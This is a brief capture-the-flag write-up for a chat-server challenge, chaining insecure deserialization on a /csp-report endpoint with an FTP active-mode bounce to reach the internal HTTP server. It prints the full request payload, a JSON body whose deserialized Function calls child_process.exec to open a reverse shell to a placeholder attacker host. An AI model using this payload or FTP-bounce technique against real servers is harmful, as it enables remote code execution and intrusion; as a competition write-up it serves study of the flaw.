* RCE is achievable via insecure deserialization on /csp-report endpoint in their HTTP server  
* Make a chatlog that looks exactly like a POST request to said endpoint, with a reverse-shell payload in it (I made 5 users with names like ``POST /csp-report?``, ``Host``, etc etc). Download the chatlog via FTP to put the file in the server.  
* Connect to their FTP server externally. Use FTP on active mode (PORT command) to send chatlog to the application’s HTTP server.  
* reverse-shell. Profit.

Payload:  
```  
POST /csp-report?: HTTP/1.1  
Host: localhost:3380  
Content-Length: 386  
Content-Type: application/csp-report

{"csp-report": {"blocked-uri": "x", "document-uri": "X", "effective-
directive": "X", "original-policy": "X", "referrer": "X", "status-code": "X",
"violated-directive": "X", "source-file": {"toString": {"___js-to-json-
class___": "Function", "json":
"process.mainModule.require(\"child_process\").exec(\"REDACTED
<YOURSERVERHERE> REDACTED ", {stdio:\"inherit\"})"}}}}  
```

Comprehensive writeup
[here](https://ubcctf.github.io/2020/11/dragonctf2020-harmony_chat/)

Original writeup
(https://ubcctf.github.io/2020/11/dragonctf2020-harmony_chat/).